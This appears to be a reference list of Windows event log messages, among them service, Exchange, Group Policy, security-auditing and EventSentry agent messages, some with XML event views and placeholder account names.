There is not enough free disk space to install the Service Pack. Required=4834 MB.


Event ID:
Source:
MSExchange CmdletLogs
Category:
General
Message:
Cmdlet suceeded. Cmdlet New-Mailbox, parameters {Name=Johnny Test User, UserPrincipalName=johnnytest@domain.local, ResetPasswordOnNextLogon=False, FirstName=Johnny, Initials=, Password=System.Security.SecureString, LastName=Test, Alias=johnnytest, SamAccountName=johnnytest}.


Event ID:
Source:
Microsoft-Windows-Servicing
Message:
Windows Servicing failed to complete the process of setting package KB967723 (Security Update) into Installed(Installed) state


Event ID:
Source:
EventSentry
Message:
The configuration for the agent (service) could not be re-read because the "Log File Monitoring" feature/function is busy and preventing an on-line configuration update. You can try to save the configuration again at a later time, or restart the EventSentry service to force a configuration update.


Event ID:
Source:
Microsoft-Windows-Hyper-V-Worker-Admin
Message:
'VM-SRV-001' started successfully. (Virtual machine ID D8EB8812-63FE-468A-9545-1E2028EC1F5F)


Event ID:
Source:
Microsoft Windows security
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.
File Name: \Device\HarddiskVolume3\Windows\System32\sysfer.dll


Event ID:
Source:
User profile service
Message:
Log Name: Application
Source: Microsoft-Windows-User Profiles Service
Date: 5/12/2012 4:13:40 PM
Event ID: 1530
Task Category: None
Level: Warning
Keywords:
User: SYSTEM
Computer: NONEOFYOURBIZ2
Description:
Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards.

DETAIL -
9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer

Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-User Profiles Service" Guid="{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}" />
<EventID>1530</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2012-05-12T20:13:40.907441900Z" />
<EventRecordID>30031</EventRecordID>
<Correlation />
<Execution ProcessID="416" ThreadID="4684" />
<Channel>Application</Channel>
<Computer>NONEOFYOURBIZ2</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData Name="EVENT_HIVE_LEAK">
<Data Name="Detail">9 user registry handles leaked from \Registry\User\S-1-5-21-664570727-300873648-2978798648-1000:
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\My
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\CA
Process 664 (\Device\HarddiskVolume2\Windows\System32\lsass.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\SystemCertificates\Disallowed
Process 1324 (\Device\HarddiskVolume2\Windows\System32\FBAgent.exe) has opened key \REGISTRY\USER\S-1-5-21-664570727-300873648-2978798648-1000\Software\Microsoft\Windows\CurrentVersion\Explorer
</Data>
</EventData>
</Event>


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows could not evaluate the Windows Management Instrumentation (WMI) filter for the Group Policy object cn={D3610029-DDDD-4141-AAAA-FDFFFFCCBB22},cn=policies,cn=system,DC=yourdomain,DC=local. This could be caused by RSOP being disabled or Windows Management Instrumentation (WMI) service being disabled, stopped, or other WMI errors. Make sure the WMI service is started and the startup type is set to automatic. New Group Policy objects or settings will not process until this event has been resolved.


Event ID:
Source:
Service Control Manager
Message:
The EventSentry service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.


Event ID:
Source:
srv
Message:
The server was unable to allocate from the system nonpaged pool because the server reached the configured limit for nonpaged pool allocations.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
An account was logged off.

Subject:
Security ID: Domain\ad2user
Account Name: ad1user
Account Domain: Domain
Logon ID: 0xbb55b23

Logon Type: 3

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.



Event ID:
Source:
Microsoft-Windows-CertificateServicesClient-AutoEnrollment
Message:
Certificate for %1 with Thumbprint %2 is about to expire or has already expired.


Event ID:
Source:
ati2mtag
Category:
POWERPLAY
Message:
System shutdown due to graphics card overheating.


Event ID:
Source:
Disk
Message:
The driver detected a controller error on \Device\Harddisk1\%.


Event ID:
Source:
Service Control Manager
Message:
The VNC Server Version 4 service terminated unexpectedly. It has done this 1 time(s)


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
An account was successfully logged on.

Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WORKSTATION123$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7

Logon Type: 7

New Logon:
Security ID: CORPDOMAIN\john.doe
Account Name: john.doe
Account Domain: CORPDOMAIN
Logon ID: 0xf3e668
Logon GUID: {00000000-0000-0000-0000-000000000000}

Process Information:
Process ID: 0x314
Process Name: C:\Windows\System32\winlogon.exe

Network Information:
Workstation Name: WORKSTATION123
Source Network Address: 127.0.0.1
Source Port: 0

Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0


Event ID:
Source:
Security
Message:
A new process has been created.

Subject:
Security ID: CORPDOMAIN\jack.doe
Account Name: jack.doe
Account Domain: CORPDOMAIN
Logon ID: 0xc2b4c

Process Information:
New Process ID: 0xcec0
New Process Name: C:\Windows\System32\PING.EXE
Token Elevation Type: TokenElevationTypeLimited (2)
Creator Process ID: 0x116c


Event ID:
Source:
e1iexpress
Message:
Intel(R) 82574L Gigabit Network Connection
Network link is disconnected.


Event ID:
Source:
Service Control Manager
Message:
The Creative Audio Service service failed to start due to the following error:
The system cannot find the file specified.


Event ID:
Source:
Kernel-PnP
Message:
The driver \Driver\WUDFRd failed to load for the device WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_GENERIC-&PROD_COMPACT_FLASH&REV_1.01#7&1C4905A4&0&058F63646476&1#.


Event ID:
Source:
Windows Media Player Network Sharing Service
Message:
Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.


Event ID:
Source:
Security
Category:
Other Logon/Logoff Events
Message:
The workstation was locked.

Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1


Event ID:
Source:
Security
Category:
Other Logon/Logoff Events
Message:
The workstation was unlocked.

Subject:
Security ID: GOTHAM\bat.man
Account Name: bat.man
Account Domain: GOTHAM
Logon ID: 0x19a2e6
Session ID: 1


Event ID:
Source:
Security
Category:
User Account Management
Message:
A user account was locked out.
Subject:
Security ID: SYSTEM
Account Name: CORPDC1$
Account Domain: CORPDOMAIN
Logon ID: 0x3e7
Account That Was Locked Out:
Security ID: S-1-5-21-1179352123-210183264333-1239653321-8754
Account Name: beth.jackson
Additional Information:
Caller Computer Name: CORPDC1


Event ID:
Source:
EventSentry
Message:
EventSentry is caching more than 1024 files in the monitored directory C:\Web. To keep the resource consumption of the EventSentry agent low it is recommended that you move old files to a sub directory or another directory.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
File System
Message:
A handle to an object was requested.

Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: COMPUTER$
Account Domain: DOMAIN
Logon ID: 0x3E7

Object:
Object Server: Security
Object Type: File
Object Name: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.9200.16384_none_8325ae6a331660a6\GdiPlus.dll
Handle ID: 0x0
Resource Attributes: -

Process Information:
Process ID: 0x354
Process Name: C:\Windows\System32\svchost.exe

Access Request Information:
Transaction ID: {00000000-0000-0000-0000-000000000000}
Accesses: READ_CONTROL
SYNCHRONIZE
ReadData (or ListDirectory)
ReadEA
ReadAttributes
WriteAttributes

Access Reasons: READ_CONTROL: Granted by D:(A;;0x1200a9;;;BA)
SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;BA)
ReadData (or ListDirectory): Granted by D:(A;;0x1200a9;;;BA)
ReadEA: Granted by D:(A;;0x1200a9;;;BA)
ReadAttributes: Granted by ACE on parent folder D:(A;;0x1200a9;;;BA)
WriteAttributes: Not granted

Access Mask: 0x120189
Privileges Used for Access Check: -
Restricted SID Count: 0


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to create a TCP connection with host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to create a UDP socket to connect to host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
EventSentry was unable to connect to the ODBC target %1 due to error "%2". EventSentry will cache data and forward it to the ODBC target once the database has become available again.


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" triggered process "%2", which ran for %3 seconds with the result shown below. Return code was %4.
%5


Event ID:
Source:
EventSentry
Message:
The process action "%1" was unable to execute process "%2" due to error "%3".


Event ID:
Source:
EventSentry
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and EventSentry was unable to terminate the process due to the following error:

%4


Event ID:
Source:
EventSentry
Message:
Process %1 (triggered by action "%2") exceeded the maximum allowed time interval of %3 minute(s) and the process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).


Event ID:
Source:
EventSentry
Message:
Action "%1" triggered process "%2" successfully.


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send trap to SNMP host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to connect to SNPP host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to pager ID "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send the message due to error: %2


Event ID:
Source:
EventSentry
Message:
Unable to connect to the SCM (service control manager) due to error %1 (%2). The action "%3" failed to execute.


Event ID:
Source:
EventSentry
Message:
Unable to open the requested service (%1) due to error %2 (%3). The action "%4" failed to execute.


Event ID:
Source:
EventSentry
Message:
Unable to send the requested control to service %1, most likely due to error %2 (%3). The action "%4" failed to execute.


Event ID:
Source:
EventSentry
Message:
The checksum for executable file "%1" changed from the original checksum "%2". Only the EventSentry agent should have access to this file. This change indicates a potential security breach, and the process will not be launched. The contents of the file should be verified; restarting the EventSentry will re-create the file.


Event ID:
Source:
EventSentry
Message:
The service %1 could not be restarted because the it could not be stopped in the first place. The notification "%2" failed to execute.


Event ID:
Source:
EventSentry
Message:
The requested service control was successfully sent to service %1, however the current service status is still %2. Please monitor the status of the %1 service to ensure it is in the desired state.


Event ID:
Source:
EventSentry
Message:
The process "%1" was terminated successfully.

Instances Terminated: %2.
Affected Process Identifiers (PIDs): %3


Event ID:
Source:
EventSentry
Message:
The process "%1" could not be terminated due to error "%2".


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to initiate a system shutdown/reboot due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to connect to Jabber host "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to send a message to chat room "%2" due to error: %3


Event ID:
Source:
EventSentry
Message:
Action "%1" was unable to submit an event to "%2" due to error "%3".


Event ID:
Source:
EventSentry
Message:
Action "%1" was successfully submitted event with number %3 to "%2".


Event ID:
Source:
EventSentry
Message:
The EventSentry agent is ready.

Version: %1
Codepage: %2

The following packages are assigned:

Event Log Packages:
-------------------
%3
Log File Packages:
-------------------
%4
System Health Packages:
-----------------------
%5
Compliance Tracking Packages:
-----------------------------
%6



Event ID:
Source:
EventSentry
Message:
The EventSentry agent is stopping


Event ID:
Source:
EventSentry
Message:
EventSentry has successfully re-opened a handle to the "%1" event log after it has become invalid due to error "%2".


Event ID:
Source:
EventSentry
Message:
Unable to allocate memory (for %1) in routine %2


Event ID:
Source:
EventSentry
Message:
The agent was unable to find the local hostname (%1, %2) in the configuration, mostly due to a license problem. Make sure that only as many full hosts are configured in the EventSentry groups as licenses are installed. Note that Heartbeat-Only hosts which have the "Monitor Agent" option set count towards full host licenses.


Event ID:
Source:
KDC
Message:
4/18/2013 9:42:41 AM
While processing a TGS request for the target server krbtgt/DOMAIN.LOCAL, the account DESKTOP04$@DOMAIN.LOCAL did not have a suitable key for generating a Kerberos ticket (the missing key has an ID of 8). The requested etypes were 18. The accounts available etypes were 23 -133 -128 3 1.



Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for the service trustedinstaller(Windows Modules Installer) changed from Running to Stopped.
Addtional Information:

Startup Type: manual
Executable: C:\Windows\servicing
TrustedInstaller.exe
Service account: LocalSystem


Event ID:
Source:
Microsoft-Windows-FailoverClustering
Message:
Cluster Shared Volume 'Volume2' ('ClusterStorage Volume 2') is no longer available on this node because of 'STATUS_CLUSTER_CSV_AUTO_PAUSE_ERROR(c0130021)'. All I/O will temporarily be queued until a path to the volume is reestablished.


Event ID:
Source:
MSExchangeAL
Category:
LDAP Operations
Message:
LDAP Bind was unsuccessful on directory OLDDC.domain.local for distinguished name ''. Directory returned error:[0x51] Server Down.

For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
MSExchange SACL Watcher
Message:
SACL Watcher servicelet found that the SeSecurityPrivilege privilege is removed from account MYDOMAIN\Exchange Servers.


Event ID:
Source:
disk
Message:
The IO operation at logical block address fd90027 for Disk 3 was retried.


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The performance counter "Performance System\Average Disk Queue Length" (PhysicalDisk(*)\Avg. Disk Queue Length) could not be monitored. Please make sure that the performance counter exists. If you are running a non-english version then you might have to adapt the name of the performance counter so it matches the language of the Operating System.


Event ID:
Source:
EventLog
Message:
The ES Network Services log file is full.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The controller debug log file has been exported.: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The controller write policy has been changed to Write Through.


Event ID:
Source:
System Error
Category:
102 (no category messagefile registered)
Message:
Error code 0000009c, parameter1 00000000, parameter2 bab3c050, parameter3 b6514000, parameter4 00000145.


Event ID:
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.



Event ID:
Source:
Microsoft-Windows-TaskScheduler/Operational
Category:
Task Start Failed
Message:
Task Scheduler failed to start "\Some Important Task" task for user "MYDOMAIN\EventMonitor". Additional Data: Error Value: 2147942402.


Event ID:
Source:
Microsoft-Windows-Hyper-V-Worker
Message:
Device 'Microsoft Synthetic Display Controller' in 'SERVER01' is loaded but has a different version from the server. Server version 3.0 Client version 3.2 (Virtual machine ID 8D6415C4-6E44-78FC-6BB8-34CCA67ACF48). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.


Event ID:
Source:
SAVOnAccess
Message:
Insufficient memory.


Event ID:
Source:
DNS
Category:
None
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.


Event ID:
Source:
emfprint
Category:
print processor
Message:
4aCreateFile(C:\WINDOWS\System32\spool\PRINTERS\00176.spl) succeeded


Event ID:
Source:
WinLogon
Message:
The winlogon notification subscriber <Profiles> took nnn second(s) to handle the notification event (Logon).


Event ID:
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
Application Server Administration job failed for service instance Microsoft.Office.Server.Search.Administration.SearchServiceInstance (dbb94537-db22-448b-92c9-d1f684a4a13e).

Reason: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.

Techinal Support Details:
System.IO.FileNotFoundException: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
File name: 'C:\WINDOWS\system32\drivers\etc\HOSTS'
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
at System.IO.FileInfo.OpenText()
at Microsoft.Search.Administration.Security.HOSTSFile.ParseHOSTSFile(Hashtable& HOSTSFileMappings, StringBuilder& HOSTSComments)
at Microsoft.Search.Administration.Security.HOSTSFile.ConfigureDedicatedGathering(SearchServiceInstance searchServiceInstance, SPServer dedicatedWebFrontEndServer, IList`1 previousWebApplicationHostNames)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.SynchronizeDefaultContentSource(IDictionary applications)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.Synchronize()
at Microsoft.Office.Server.Administration.ApplicationServerJob.ProvisionLocalSharedServiceInstances(Boolean isAdministrationServiceJob)


Event ID:
Source:
Search
Message:
Could not get performance counter registry information for WSearchIdxPi for instance due to the following error: The operation completed successfully. 0x0.


Event ID:
Source:
Search
Message:
Performance monitoring cannot be initialised for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.

Context: Application, SystemIndex Catalogue


Event ID:
Source:
Search
Message:
Performance monitoring cannot be initialised for the gatherer service, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.


Event ID:
Source:
Kernel-PnP
Category:
(212)
Message:
The driver \Driver\WUDFRd failed to load for the device SWD\WPDBUSENUM\{e21c02d7-760e-11e3-be76-806e6f6e6963}#000000000003F000.


Event ID:
Source:
e1iexpress
Message:
The description for Event ID 27 from source e1iexpress cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Intel(R) 82583V Gigabit Network Connection
the message resource is present but the message is not found in the string/message table


Event ID:
Source:
Display
Message:
Display driver amdkmdap stopped responding.


Event ID:
Source:
SecurityCenter
Message:
windows security center service could not stop windows defender


Event ID:
Source:
PerfNet
Message:
Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.


Event ID:
Source:
NETLOGON
Category:
None
Message:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.


Event ID:
Source:
ESENT
Category:
Logging/Recovery
Message:
LiveComm (6812) C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\: The shadow header page of file C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\DBStore\livecomm.edb was damaged. The primary header page (8192 octets) was used instead.


Event ID:
Source:
NtServicePack
Category:
None
Message:
Windows XP WIC installation failed.
Access is denied.


Event ID:
Source:
VMware Tools
Message:
[ warning] [vmusr:vmtoolsd] Failed registration of app type 2 (Signals) from plugin unity.


Event ID:
Source:
Microsoft-Windows-CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed to enroll for a DomainController certificate with request ID N/A from testsql.domain.local\TESTCA (The RPC server is unavailable. 0x800706ba (WIN32: 1722)).


Event ID:
Source:
NETLOGON
Message:
This computer was not able to set up a secure session with a domain controller in domain NETIKUS due to the following:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.

ADDITIONAL INFO
If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.


Event ID:
Source:
Microsoft-Windows-IIS-W3SVC-PerfCounters
Message:
It has taken too long to refresh the W3SVC counters, the stale counters are being used instead.


Event ID:
Source:
MSExchange Mid-Tier Storage
Message:
Ping of mdb 'b001e27b-bd30-4b98-998d-d0baf7803fba' timed out after '00:00:00' minutes. Last successful ping was at '6/10/2014 11:50:11 AM' UTC.


Event ID:
Source:
MSExchange EdgeSync
Category:
Initialization
Message:
Initialization failed with exception: Microsoft.Exchange.EdgeSync.Common.EdgeSyncServiceConfigNotFoundException: Couldn't find EdgeSync service configuration object for the site SiteName. If the configuration object doesn't exist in the Active Directory location CN=EdgeSyncService,CN=SiteName,CN=Sites,CN=Configuration,DC=domain,DC=local, create it using the New-EdgeSyncServiceConfig cmdlet. If the object does exist, check its permissions.. If this warning frequently occurs, contact Microsoft Product Support.


Event ID:
Source:
ntfs
Category:
2
Message:
The default transaction resource manager on volume C: encountered a non-retryable error and could not start. The data contains the error code.

<Keywords>0x80000000000000</Keywords>


Event ID:
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 980) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (10). User Action: Contact your application vendor for an updated version of the application.

Detailed XML View

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2014-07-21T09:20:57.835029200Z" />
<EventRecordID>136</EventRecordID>
<Correlation />
<Execution ProcessID="980" ThreadID="112" />
<Channel>Application</Channel>
<Computer>Pochi-01</Computer>
<Security UserID="S-1-5-19" />
</System>
- <EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">980</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">10</Data>
</EventData>
</Event>


Event ID:
Source:
EventSentry
Message:
Der Dienststatus von Dienst eventsentryheartbeatmonitor (EventSentry Heartbeat Monitor) ist weiterhin Stopped.

Zusätzliche Dienstinformationen:

Starttyp: Automatic
EXE-Datei: C:\WINDOWS\SYSWOW64\EVENTSENTRY\EVENTSENTRY_HB_SVC.EXE
Benutzerkonto: LocalSystem


Event ID:
Source:
PostgreSQL
Message:
ERROR: duplicate key value violates unique constraint "idx_es_logontracking_unique"
DETAIL: Key (computername, username, start_unix, logonid)=(2, 30, 1409919385, 0xedeedc2f) already exists.
STATEMENT: insert into eventsentry.ESLogonTracking (start_unix,start_datetime,computername,groupname,username,LogonID,SourceIP,SourceComputer,ComputerProductType,eventnumber,RemoteDesktopState,incomplete,duration,LogonType,IsSession) values(1409919385,'2014-09-05 12:16:25'::timestamp,2,3,30,'0xedeedc2f',3,13,'SRV',0,1,0,0,10,1)


Event ID:
Source:
MSExchangeIS Mailbox Store
Category:
Content Indexing
Message:
Content Indexing function 'CISearch::EcGetRowsetAndAccessor' received an unusual and unexpected error code from MSSearch.
Mailbox Database: Mailbox Database
Error Code: 0x80041606


Event ID:
Source:
EventSentry
Category:
NTP Synchronization
Message:
EventSentry was unable to retrieve the current time from host ntp.mydomain.local due to the following error: Server time not synchronised.


Event ID:
Source:
Microsoft-Windows-Time-Service
Message:
NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)


Event ID:
Source:
Service Control Manager
Message:
De Windows Presentation Foundation Font Cache 3.0.0.0-service is bij het starten vastgelopen.


Event ID:
Source:
MSExchangeIS Mailbox
Category:
Content Indexing
Message:
Function CISearch::EcGetRowsetAndAccessor detected that content indexing was disabled for database "Mailbox Database 1144709849" because of error "0x80041820" from MSSearch.


Event ID:
Source:
Windows Server Update Services
Category:
Clients
Message:
No client computers have ever contacted the server.


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Reached crypt32 threshold of 50 events and will suspend logging for 60 minutes.


Event ID:
Source:
Server Administrator
Message:
Log size is no longer near or at capacity
Log type: ESM



Event ID:
Source:
SChannel
Message:
The following fatal alert was received: 42.


Event ID:
Source:
ESENT
Category:
General
Message:
WUDFHost (8232) WindowsLocationProviderDatabase: An attempt to open the file "C:\ProgramData\Microsoft\Windows\LocationProvider\edbtmp.log" for read / write access failed with system error 5 (0x00000005): "Access is denied. ". The open file operation will fail with error -1032 (0xfffffbf8).


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.


Event ID:
Source:
MSExchangeTransport
Category:
SmtpReceive
Message:
Receive connector Allow SMTP rejected an incoming connection from IP address 1.2.3.4. The maximum number of connections per source (20) for this connector has been reached by this source IP address.


Event ID:
Source:
MSExchangeTransport
Category:
RemoteDelivery
Message:
A message with the Internal Message ID 12345 was rejected by the remote server. This message will be deferred and retried because it was marked for retry if rejected. Other messages may also have encountered this error.


Event ID:
Source:
User32
Message:
The attempt by user DOMAIN\someuser to logoff computer WKS123 failed


Event ID:
Source:
Userenv
Message:
Windows cannot determine the user or computer name. (Not enough storage is available to complete this operation. )


Event ID:
Source:
RPC (Microsoft-Windows-RPC-Events)
Category:
none
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
